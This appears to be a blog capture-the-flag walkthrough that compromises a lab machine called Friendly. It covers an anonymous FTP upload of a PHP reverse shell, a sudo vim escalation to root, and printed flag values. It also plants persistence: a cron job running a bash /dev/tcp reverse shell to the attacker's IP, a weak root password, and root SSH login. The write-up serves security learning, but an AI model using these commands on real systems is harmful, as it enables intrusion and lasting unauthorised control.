FRIENDLY MACHINE

 FRIENDLY MACHINE

I successfully identified several devices on your local network, including the target machine at 11.0.0.13 with the MAC address 08:00:27:a2:9f:c0. This is the crucial first step in identifying your target you can see below.
┌──(root㉿kali)-[/home/luis]
└─# arp-scan -I eth0 --localnet
Interface: eth0, type: EN10MB, MAC: 08:00:27:4d:8a:0f, IPv4: 11.0.0.11
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
11.0.0.1	52:54:00:12:35:00	(Unknown: locally administered)
11.0.0.2	52:54:00:12:35:00	(Unknown: locally administered)
11.0.0.3	08:00:27:0c:be:49	(Unknown)
11.0.0.13	08:00:27:a2:9f:c0	(Unknown)
Now as the machine are deploy, we have to execute ports can thus we need to discover hidden ports which are:
  1. port 21(FTP)
  2. port 80(HTTP)
┌──(root㉿kali)-[/home/luis]
└─# nmap -n -Pn -p- --min-rate 5000 -sC 11.0.0.13 -vvv 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-26 18:50 CEST
NSE: Loaded 126 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 18:50
Completed NSE at 18:50, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 18:50
Completed NSE at 18:50, 0.00s elapsed
Initiating ARP Ping Scan at 18:50
Scanning 11.0.0.13 [1 port]
Completed ARP Ping Scan at 18:50, 0.08s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 18:50
Scanning 11.0.0.13 [65535 ports]
Discovered open port 21/tcp on 11.0.0.13
Discovered open port 80/tcp on 11.0.0.13
Completed SYN Stealth Scan at 18:50, 4.33s elapsed (65535 total ports)
NSE: Script scanning 11.0.0.13.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 18:50
NSE: [ftp-bounce 11.0.0.13:21] PORT response: 500 Illegal PORT command
Completed NSE at 18:50, 0.89s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 18:50
Completed NSE at 18:50, 0.00s elapsed
Nmap scan report for 11.0.0.13
Host is up, received arp-response (0.00043s latency).
Scanned at 2025-08-26 18:50:05 CEST for 5s
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack ttl 64
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--   1 root     root        10725 Feb 23  2023 index.html
80/tcp open  http    syn-ack ttl 64
|_http-title: Apache2 Debian Default Page: It works
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
MAC Address: 08:00:27:A2:9F:C0 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 18:50
Completed NSE at 18:50, 0.01s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 18:50
Completed NSE at 18:50, 0.00s elapsed
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 5.61 seconds
           Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)

In addition, we should try enter in 21 port which shouldn't have password as you can see below:
┌──(root㉿kali)-[/home/luis]
└─# ftp 11.0.0.13
Connected to 11.0.0.13.
220 ProFTPD Server (friendly) [::ffff:11.0.0.13]
Name (11.0.0.13:luis): anonymous
331 Anonymous login ok, send your complete email address as your password
Password: 
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||46655|)
150 Opening ASCII mode data connection for file list
-rw-r--r--   1 root     root        10725 Feb 23  2023 index.html
226 Transfer complete

Now as we have access to machine let's go to create the reverse shell which this web application which is in this link: 

In addition, we are going to create file which we'll write reverse shell which name is: reverse_shell.php as you can see below.
┌──(root㉿kali)-[/home/luis]
└─# nano reverse_shell.php 

But before, we should know our IP Address which is 11.0.0.11 as you can see below:
┌──(root㉿kali)-[/home/luis]
└─# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host noprefixroute 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:4d:8a:0f brd ff:ff:ff:ff:ff:ff
    inet 11.0.0.11/24 brd 11.0.0.255 scope global dynamic noprefixroute eth0
       valid_lft 452sec preferred_lft 452sec
    inet6 fe80::a00:27ff:fe4d:8a0f/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:ef:b8:d2:50 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
    inet6 fe80::42:efff:feb8:d250/64 scope link proto kernel_ll 
       valid_lft forever preferred_lft forever

In addition, we have to enter again to ftp server and upload the malicious file with the command which you can see below:                                                
ftp> put reverse_shell.php
local: reverse_shell.php remote: reverse_shell.php
229 Entering Extended Passive Mode (|||24541|)
150 Opening BINARY mode data connection for reverse_shell.php
100% |*********************************************************************************|  5490       31.73 MiB/s    00:00 ETA
226 Transfer complete
5490 bytes sent in 00:00 (224.98 KiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||49914|)
150 Opening ASCII mode data connection for file list
-rw-r--r--   1 root     root        10725 Feb 23  2023 index.html
-rw-r--r--   1 ftp      nogroup      5490 Aug 26 16:56 reverse_shell.php
226 Transfer complete

Now, we must open listener with the port which we have write in the reverse_shell.php which is 4444 as you can see below.
Then we have to execute this file reload the website: http://11.0.0.13/reverse_shell.php and as you can see below we have got the shell.
┌──(root㉿kali)-[/home/luis]
└─# nc -lvp 4444     
listening on [any] 4444 ...
11.0.0.13: inverse host lookup failed: Unknown host
connect to [11.0.0.11] from (UNKNOWN) [11.0.0.13] 39252
Linux friendly 5.10.0-21-amd64 #1 SMP Debian 5.10.162-1 (2023-01-21) x86_64 GNU/Linux
 12:58:32 up 10 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
Now, we must execute the next commands to create persistence in the machine you can see below which are:
  1. script /dev/null -c bash
  2.  ^Z
  3. stty raw -echo;fg 
  4. reset xterm
  5. export TERM=xterm
  6. export SHELL=BASH

$ script /dev/null -c bash
Script started, output log file is '/dev/null'.
www-data@friendly:/$ ^Z
zsh: suspended  nc -lvp 4444
                                                                                                                              
┌──(root㉿kali)-[/home/luis]
└─# stty raw -echo;fg  
[1]  + continued  nc -lvp 4444
			reset xterm

www-data@friendly:/$ export SHELL=bash
www-data@friendly:/$ export TERM=xterm

Now, we have to discover user.txt and root.txt flat and let's go to listing the files which are:
  • cd /home/ (To change the home directory)
  • ls (To listing the files, folders etc.)
  • cd RiJaba1 (To change RiJaba1)
  • ls (To listing the files, folders etc. )
  • cat user.txt (To reading the user flag)
www-data@friendly:/$ cd /home/
www-data@friendly:/home$ ls
RiJaba1
www-data@friendly:/home$ cd RiJaba1
www-data@friendly:/home/RiJaba1$ ls
CTF  Private  YouTube  user.txt
www-data@friendly:/home/RiJaba1$ cat user.txt

Gotcha! we have obtained the user flag
b8cff8c9008e1c98a1f2937b4475acd6

Now, we must discover root.txt flat and let's go to execute sudo -l and we need escalate privs.
www-data@friendly:/$ sudo -l
Matching Defaults entries for www-data on friendly:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on friendly:
    (ALL : ALL) NOPASSWD: /usr/bin/vim

We have become root as you can see below with this command which has been discovered in this webpage: https://gtfobins.github.io/gtfobins/vim/.



www-data@friendly:/$ sudo vim -c ':!/bin/bash'

root@friendly:/# whoami
root
root@friendly:/# cd /home/

Now, we are going to execute this command which it will permit get the file root.txt as you can see below.
root@friendly:/home# find / -name root.txt
/var/log/apache2/root.txt
/root/root.txt
root@friendly:/home# cat /root/root.txt
Not yet! Find root.txt.
root@friendly:/home# cat /var/log/apache2/root.txt

Gotcha! we have obtained the root flag
66b5c58f3e83aff307441714d3e28d2f

Persistence with crontab
Now we let's go to mantain the access in the machine with crontab as you can see below.

root@friendly:/home# crontab -e
no crontab for root - using an empty one

Select an editor.  To change later, run 'select-editor'.
  1. /bin/nano        <---- easiest
  2. /usr/bin/vim.basic
  3. /usr/bin/vim.tiny

Choose 1-3 [1]: 1
No modification made
# 
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').
# 
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
# 
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
# 
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
# 
# For more information see the manual pages of crontab(5) and cron(8)
# We have to introduce the reverse_shell as you can see below with this toolkit which is:

# m h  dom mon dow   command
Persistence 1 crontab
  * *  *    *   *     /bin/bash -c 'bash -i >& /dev/tcp/11.0.0.11/443 0>&1'

And then we should be able to obtain shell in 1 min as you can see below.
┌──(root㉿kali)-[/home/luis]
└─# nc -lvp 443
listening on [any] 443 ...
11.0.0.13: inverse host lookup failed: Unknown host
connect to [11.0.0.11] from (UNKNOWN) [11.0.0.13] 43482
bash: cannot set terminal process group (729): Inappropriate ioctl for device
bash: no job control in this shell
root@friendly:~#

Persistence with SSH ROOT
Now we let's go to mantain the access in the machine with ssh protocol but first we have to  do the next steps which you can see below:
  • apt update -y (To updating the packets)
root@friendly:~# apt update -y
apt update -y

WARNING: apt does not have a stable CLI interface. Use with caution in scripts.

Get:1 http://security.debian.org/debian-security bullseye-security InRelease [27.2 kB]
Get:2 http://deb.debian.org/debian bullseye InRelease [75.1 kB]
Get:3 http://deb.debian.org/debian bullseye-updates InRelease [44.0 kB]
Get:4 http://security.debian.org/debian-security bullseye-security/main Sources [252 kB]
Get:5 http://security.debian.org/debian-security bullseye-security/contrib Sources [1,128 B]
Get:6 http://security.debian.org/debian-security bullseye-security/main amd64 Packages [392 kB]
Get:7 http://security.debian.org/debian-security bullseye-security/main Translation-en [261 kB]
Get:8 http://security.debian.org/debian-security bullseye-security/contrib amd64 Packages [2,880 B]
Get:9 http://security.debian.org/debian-security bullseye-security/contrib Translation-en [2,512 B]
Get:10 http://deb.debian.org/debian bullseye/main Sources [8,500 kB]
Get:11 http://deb.debian.org/debian bullseye/main amd64 Packages [8,066 kB]
Get:12 http://deb.debian.org/debian bullseye/main Translation-en [6,235 kB]
Get:13 http://deb.debian.org/debian bullseye-updates/main Sources.diff/Index [26.3 kB]
Get:14 http://deb.debian.org/debian bullseye-updates/main amd64 Packages.diff/Index [26.3 kB]
Get:15 http://deb.debian.org/debian bullseye-updates/main Translation-en.diff/Index [12.8 kB]
Get:16 http://deb.debian.org/debian bullseye-updates/main Sources T-2023-12-29-1403.39-F-2023-03-25-2025.40.pdiff [4,354 B]
Get:17 http://deb.debian.org/debian bullseye-updates/main amd64 Packages T-2023-12-29-1403.39-F-2023-03-25-2025.40.pdiff [6,365 B]
Get:16 http://deb.debian.org/debian bullseye-updates/main Sources T-2023-12-29-1403.39-F-2023-03-25-2025.40.pdiff [4,354 B]
Get:17 http://deb.debian.org/debian bullseye-updates/main amd64 Packages T-2023-12-29-1403.39-F-2023-03-25-2025.40.pdiff [6,365 B]
Get:18 http://deb.debian.org/debian bullseye-updates/main Translation-en T-2025-07-21-2004.39-F-2023-05-24-2006.01.pdiff [3,378 B]
Get:18 http://deb.debian.org/debian bullseye-updates/main Translation-en T-2025-07-21-2004.39-F-2023-05-24-2006.01.pdiff [3,378 B]
Get:19 http://deb.debian.org/debian bullseye-updates/main Sources [7,908 B]
Get:20 http://deb.debian.org/debian bullseye-updates/main Translation-en [10.5 kB]
Get:21 http://deb.debian.org/debian bullseye-updates/main amd64 Packages [18.8 kB]
Fetched 24.0 MB in 8s (3,151 kB/s)
Reading package lists...
Building dependency tree...
Reading state information...
137 packages can be upgraded. Run 'apt list --upgradable' to see them.

  • passwd root (To change the password root).
root@friendly:~# passwd root
passwd root
New password: 123123
Retype new password: 123123
passwd: password updated successfully
  • apt install openssh-server (To install openssh server).
root@friendly:~# apt install openssh-server
apt install openssh-server

WARNING: apt does not have a stable CLI interface. Use with caution in scripts.

Reading package lists...
Building dependency tree...
Reading state information...
The following additional packages will be installed:
  libwrap0 openssh-client openssh-sftp-server runit-helper
Suggested packages:
  keychain libpam-ssh monkeysphere ssh-askpass molly-guard ufw
The following NEW packages will be installed:
  libwrap0 openssh-server openssh-sftp-server runit-helper
The following packages will be upgraded:
  openssh-client
1 upgraded, 4 newly installed, 0 to remove and 136 not upgraded.
Need to get 1,438 kB of archives.
After this operation, 1,890 kB of additional disk space will be used.
Do you want to continue? [Y/n] Y
Get:1 http://deb.debian.org/debian bullseye/main amd64 libwrap0 amd64 7.6.q-31 [59.0 kB]
Get:2 http://security.debian.org/debian-security bullseye-security/main amd64 openssh-client amd64 1:8.4p1-5+deb11u5 [932 kB]
Get:3 http://deb.debian.org/debian bullseye/main amd64 runit-helper all 2.10.3 [7,808 B]
Get:4 http://security.debian.org/debian-security bullseye-security/main amd64 openssh-sftp-server amd64 1:8.4p1-5+deb11u5 [52.9 kB]
Get:5 http://security.debian.org/debian-security bullseye-security/main amd64 openssh-server amd64 1:8.4p1-5+deb11u5 [386 kB]
apt-listchanges: Reading changelogs...
dpkg-preconfigure: unable to re-open stdin: 
Fetched 1,438 kB in 2s (718 kB/s)
(Reading database ... 36396 files and directories currently installed.)
Preparing to unpack .../openssh-client_1%3a8.4p1-5+deb11u5_amd64.deb ...
Unpacking openssh-client (1:8.4p1-5+deb11u5) over (1:8.4p1-5+deb11u1) ...
Selecting previously unselected package libwrap0:amd64.
Preparing to unpack .../libwrap0_7.6.q-31_amd64.deb ...
Unpacking libwrap0:amd64 (7.6.q-31) ...
Selecting previously unselected package openssh-sftp-server.
Preparing to unpack .../openssh-sftp-server_1%3a8.4p1-5+deb11u5_amd64.deb ...
Unpacking openssh-sftp-server (1:8.4p1-5+deb11u5) ...
Selecting previously unselected package runit-helper.
Preparing to unpack .../runit-helper_2.10.3_all.deb ...
Unpacking runit-helper (2.10.3) ...
Selecting previously unselected package openssh-server.
Preparing to unpack .../openssh-server_1%3a8.4p1-5+deb11u5_amd64.deb ...
Unpacking openssh-server (1:8.4p1-5+deb11u5) ...
Setting up runit-helper (2.10.3) ...
Setting up openssh-client (1:8.4p1-5+deb11u5) ...
Setting up libwrap0:amd64 (7.6.q-31) ...
Setting up openssh-sftp-server (1:8.4p1-5+deb11u5) ...
Setting up openssh-server (1:8.4p1-5+deb11u5) ...

Creating config file /etc/ssh/sshd_config with new version
Creating SSH2 RSA key; this may take some time ...
3072 SHA256:xjQJYHzvg+zDU8TPUGfZvK7wv+Af2UFWHmtM+4rpYRQ root@friendly (RSA)
Creating SSH2 ECDSA key; this may take some time ...
256 SHA256:Dyz8jUWoShln4QQi/84pZDmkqbuuxcn73BH2qSomHlM root@friendly (ECDSA)
Creating SSH2 ED25519 key; this may take some time ...
256 SHA256:WGoO5zlblfIgVrkgpAHyJsGbvnnLLBc3uba7sdgnitM root@friendly (ED25519)
Created symlink /etc/systemd/system/sshd.service → /lib/systemd/system/ssh.service.
Created symlink /etc/systemd/system/multi-user.target.wants/ssh.service → /lib/systemd/system/ssh.service.
rescue-ssh.target is a disabled or a static unit, not starting it.
Processing triggers for man-db (2.9.4-2) ...
Processing triggers for libc-bin (2.31-13+deb11u5) ...
  • systemctl start ssh (Init ssh service).
root@friendly:~# systemctl start ssh
systemctl start ssh
  • sudo nmap -n -Pn -sC 11.0.0.13 -vvv (To see if the port 22 is alive).
┌──(luis㉿kali)-[~]
└─$ sudo nmap -n -Pn -sC 11.0.0.13 -vvv 
[sudo] contraseña para luis: 
Lo siento, pruebe otra vez.
[sudo] contraseña para luis: 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-26 19:34 CEST
NSE: Loaded 126 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 19:34
Completed NSE at 19:34, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 19:34
Completed NSE at 19:34, 0.00s elapsed
Initiating ARP Ping Scan at 19:34
Scanning 11.0.0.13 [1 port]
Completed ARP Ping Scan at 19:34, 0.09s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 19:34
Scanning 11.0.0.13 [1000 ports]
Discovered open port 22/tcp on 11.0.0.13
Discovered open port 80/tcp on 11.0.0.13
Discovered open port 21/tcp on 11.0.0.13
Completed SYN Stealth Scan at 19:34, 0.12s elapsed (1000 total ports)
NSE: Script scanning 11.0.0.13.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 19:34
NSE: [ftp-bounce 11.0.0.13:21] PORT response: 500 Illegal PORT command
Completed NSE at 19:34, 0.86s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 19:34
Completed NSE at 19:34, 0.00s elapsed
Nmap scan report for 11.0.0.13
Host is up, received arp-response (0.00042s latency).
Scanned at 2025-08-26 19:34:08 CEST for 1s
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack ttl 64
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--   1 root     root        10725 Feb 23  2023 index.html
|_-rw-r--r--   1 ftp      nogroup      5490 Aug 26 16:56 reverse_shell.php
22/tcp open  ssh     syn-ack ttl 64
| ssh-hostkey: 
|   3072 03:44:1d:c8:b3:c2:f6:ea:07:a1:a0:1e:67:60:07:1c (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDWUakwkMQiMiFiZuOa6gTvVV9gSxROswqHXZ9EVGnhspSFJYzJV2mYQBSU3wlfoEYkbIBY8/CE+maprqYWsaXUDuEqdPHoW5SkaU7huZjZ9prHp0Yij+KlAB+1bXofYhBB7He9+OVuSnYwNnSvKIqKb2vZ4K+zHwuwPgxIeO2s8GYoQZ9S5nFkoGgmNkH969v4jtMQ/WkGp5Nv1kb2P/TwXr9jEvwWEj9XuStUsicCe6hFEr3w8KLAlr96vXwDbru2JtI1FAuFtWN8tTn8k0UIKeaOQbHVIrIj9I4+VNfiRkROGQA8DocCGtDf9j/xZnxlzYPjx/BFJUmmySSppQImWBLiBW3Xb44s7sBft71B0qqDt0QQwIoOrNpqFEUcR6KjFmxupCBPnQPpQXHlel9reSkwUA1omxlxsyIC6kpUT5tZN5ZVqRxcNllshJQOEEf3DMRdoz+14+tgT0rSF/i9jOKBH90CWKT740dOnw1Y/1GZ3VmwDMf/nsLeX9yYfVk=
|   256 74:a1:b4:17:9b:85:fa:f8:7a:8d:68:55:0e:d6:6a:95 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMVio28pIxc/EMCkknbW5H7OUYbLOxAACjUOxyyu3oecP9xCRPRFUmSf9ZqBpWhYmmCxLYoNiE5gvp7qlsNFJY0=
|   256 5f:c2:37:bf:78:1e:81:7f:68:f2:ba:1d:32:06:6c:7e (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHhdThFcS1XCMuwvt+98NtQCgF7W6XDJn9ByN0Raft9p
80/tcp open  http    syn-ack ttl 64
|_http-title: Apache2 Debian Default Page: It works
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
MAC Address: 08:00:27:A2:9F:C0 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 19:34
Completed NSE at 19:34, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 19:34
Completed NSE at 19:34, 0.00s elapsed
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.39 seconds
                     
                Raw packets sent: 1001 (44.028KB) | Rcvd: 1001 (40.040KB)
  • Editing the file /etc/ssh/sshd_config  as you can see below.
┌──(luis㉿kali)-[~]
└─$/etc/ssh/sshd_config  

# Ciphers and keying
#RekeyLimit default none

# Logging
#SyslogFacility AUTH
#LogLevel INFO

# Authentication:

#LoginGraceTime 2m
PermitRootLogin yes(Editing this perm)
#StrictModes yes
#MaxAuthTries 6
#MaxSessions 10
  • sudo systemctl restart ssh ( To restart ssh service)
  • systemctl status ssh (To see if  ssh service is alive)
root@friendly:/# sudo systemctl restart ssh
root@friendly:/# systemctl status ssh
* ssh.service - OpenBSD Secure Shell server
     Loaded: loaded (/lib/systemd/system/ssh.service; enabled; vendor preset: e>
     Active: active (running) since Tue 2025-08-26 13:45:09 EDT; 11s ago
       Docs: man:sshd(8)
             man:sshd_config(5)
    Process: 11097 ExecStartPre=/usr/sbin/sshd -t (code=exited, status=0/SUCCES>
   Main PID: 11098 (sshd)
      Tasks: 1 (limit: 2337)
     Memory: 1.0M
        CPU: 21ms
     CGroup: /system.slice/ssh.service
             -11098 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups

Aug 26 13:45:09 friendly systemd[1]: Starting OpenBSD Secure Shell server...
Aug 26 13:45:09 friendly sshd[11098]: Server listening on 0.0.0.0 port 22.
Aug 26 13:45:09 friendly sshd[11098]: Server listening on :: port 22.
Aug 26 13:45:09 friendly systemd[1]: Started OpenBSD Secure Shell server.

To sum up, if you have had all before steps, you should be able to obtain shell as root as you can see below.
┌──(luis㉿kali)-[~]
└─$ ssh root@11.0.0.13  
The authenticity of host '11.0.0.13 (11.0.0.13)' can't be established.
ED25519 key fingerprint is SHA256:WGoO5zlblfIgVrkgpAHyJsGbvnnLLBc3uba7sdgnitM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '11.0.0.13' (ED25519) to the list of known hosts.
root@11.0.0.13's password: 
Linux friendly 5.10.0-21-amd64 #1 SMP Debian 5.10.162-1 (2023-01-21) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Mar 11 04:00:51 2023
root@friendly:~#

I hope you liked and learned something new

This article has been done with ethical proposes

Good Hack

Comments

Post a Comment

Entradas Populares

INTERNAL

Image
 INTERNAL(TRYHACKME) First of all, let's go execute nmap command to identify alives ports and version with this host 192.168.88.6 as you can see below. Key open ports and services include: Web Servers: Port 80 (HTTP):  Running  Apache2 Ubuntu Default Page . It supports  OPTIONS ,  TRACE  (flagged as potentially risky),  GET ,  HEAD , and  POST  methods. The webpage title is " INTERNAL ". SSH Protocol Port 22 (SSH): Running Linux . ┌──(root㉿kali)-[/home/luis/Descargas] └─# nmap -n -Pn -p- --min-rate 5000 -sC 10.10.216.78 -vvv Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-07 12:06 CEST NSE: Loaded 126 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 2) scan. Initiating NSE at 12:06 Completed NSE at 12:06, 0.00s elapsed NSE: Starting runlevel 2 (of 2) scan. Initiating NSE at 12:06 Completed NSE at 12:06, 0.00s elapsed Initiating SYN Stealth Scan at 12:06 Scanning 10.10.216.78 [65535 ports] Discove...
Read more »

TOR WEB BROWSER

Image
  TOR WEB BROWSER TOR INSTALLATION First of all; we're going to this link from the oficial webpage: https://www.torproject.org/es/download/   where we have to download this version our laptop, Windows and Linux but in my case I've had to download for Windows 10. When the program is installed we will press execute and we'll follow step by step:   We'll open and we'll see this image where you have to select the language and select ok to continue the instal l ation. In addition, we'll select the location wherever you want install the program, but in my case I prefer the default location and you'll able to select wherever you want. Now, we will be started the installation process and when it finished you will be able to see the picture below: TOR CONNECT If the process has been successful, you will be able to connect with the connect button which you can observe in both pictures below: ADD A BRIDGE ...
Read more »

activedirectory

Image
ACTIVEDIRECTORY (TRYHACKME) First of all, let’s go to execute nmap toolkit and we'll be able to start the enumeration of the ports as you can see below with this command: sudo nmap -n -Pn -p- --min-rate 5000 10.10.135.154 -vvv -sC -sV This revealed several open TCP ports with associated services, including: DNS (53),  HTTP  (80),  Kerberos (88),  RPC (135),  NetBIOS-SSN (139),  SMB (445),  RDP (3389),  WS-Management (5985)  LDAP (389, 636, 3268, 3269) Moreover, service and NSE script detection provided valuable information about the services running on these ports, such as IIS 10.0, Microsoft Windows Kerberos , Active Directory LDAP , and Microsoft Terminal Services . The SSL/TLS certificate information on port 3389 indicated the common name AttacktiveDirectory.spookysec.local, reinforcing the target as an Active Directory server. rdp-ntlm-info also provided details about the domain (THM-AD) and computer name (ATTACKTIVEDIREC) as you can se...
Read more »

PICKLE RICK

Image
  PICKLE RICK I'm going to realize the resolution of the machine Level Easy from Tryhackme called  Pickle Rick  which is a machine so easy to realize. First of all,  we can observe that in the picture bellow we have some inforamtion and I'm going to execute control +u  and we can see in the second picture below that we've obtained a  Username. I'm going to gathering information about machine and I have to enter in the Linux terminal and I must introduce this command which you canobserve in the picture below:   gobuster dir -u(url) http://10.10.99.188/ -w(password dictionary)  /usr/share/wordlist/dirb/common.txt -x (formato que quereos que busque) .txt*, .php, .login,  In this case, we can observe that scan has discovered this 4 webpages: /assests /denied.php /index.html /login.php /robots.txt Now, we can see such as the web page from /robots.txt   it seems the password in the picture below. Now, we've discovered this login web page...
Read more »

Metasploit Framework

Image
 METASPLOIT FRAMEWORK USE TO  AUXILIARY MODULE FROM METASPLOIT First of all, I have used the auxiliary modules from Metasploit-Framework which could allow me Scanning, see ports, SO version, vulnerability in applications etc, where you can see at the bottom of the picture if  I use this module whose name is: auxiliary/scanner/discovery/arp_sweep  (To verify the IPs listening in the network) Now, we can observe that when I have selected in the auxiliary module I have had to do this set up  that we can observe in the second page below: INTERFACE : This I've set up the network interface that in my case is the eth0 interface. RHOSTS :This I've set up the IP Address which I am finding out that in my case is 192.168.100.0/24 (all the IP Address from network that could be possible which I am analyzing). THREADS : Are the threads; it's the fast  that I want to analyze the IP Addresses but in my case there are 15 threads because I want to analize as fast as possible...
Read more »

HOSTING

Image
HOSTING First of all, let's go to hosting machine from active directory, for it  using arp-scan to discover active hosts on the local network, identifying 192.168.88.8 as you can see in below. ┌──(kali㉿kali)-[~] └─$ sudo arp-scan -I eth0 --localnet Interface: eth0, type: EN10MB, MAC: 08:00:27:43:73:bc, IPv4: 192.168.88.5 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.88.1 d8:44:89:50:2d:a3 (Unknown) 192.168.88.8 08:00:27:98:d4:bf PCS Systemtechnik GmbH 192.168.88.9 00:e0:4c:69:66:4a REALTEK SEMICONDUCTOR CORP. 3 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 2.075 seconds (123.37 hosts/sec). 3 responded ┌──(kali㉿kali)-[~] └─$ ping -c1 192.168.88.8 PING 192.168.88.8 (192.168.88.8) 56(84) bytes of data. 64 bytes from 192.168.88.8: icmp_seq=1 ttl=128...
Read more »

LOVE

Image
BUSCALOVE First of all, I am going to do this machine from cybersecurity labs called BuscaLove which is easy Level. For it, let’s go to open Linux terminal and we have to write the command when we can see in the picture below. cd Descargas In addition, we have to depress the unzip file whose name’s buscalove.zip you can see in the picture below. Now we have to deploy the vulnerability machine whose command is sudo bash auto_deploy.sh buscalove.tar we can see in the picture below. On the other hand, to start the attack at virtual machine, we must verify if the attacker machine is in the same range of IP Address and we have to introduce this command which is ping -c 3 172.18.0.2 we can see in the picture below. As I,ve just seen the IP Address it’s in the same range of my IP Address we have to introduce the command with nmap tool which is nmap -n -Pn 172.18.0.2 -p- - -min-rate 4000 -vvv( here you can see in this picture the scanner) but I’ve got it 2 ports: 22: open ssh 80: open http No...
Read more »

CHANGE MACHINE

Image
CHANGE  First of all, let's go to hosting machine from active directory, for it  using  arp-scan  to discover active hosts on the local network, identifying  192.168.88.8   as you can see in below . ┌──(root㉿kali)-[/home/luis] └─# arp-scan -I eth0 --localnet Interface: eth0, type: EN10MB, MAC: 08:00:27:4d:8a:0f, IPv4: 192.168.88.6 WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.88.1 d8:44:89:50:2d:a3 (Unknown) 192.168.88.4 00:e0:4c:97:01:a7 (Unknown) 192.168.88.5 00:d8:61:fa:c0:4a (Unknown) 192.168.88.7 08:00:27:b1:ae:9f (Unknown) 4 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 1.848 seconds (138.53 hosts/sec). 4 responded Now, let's go execute nmap command to identify alives ports and version with this host  192.168.88...
Read more »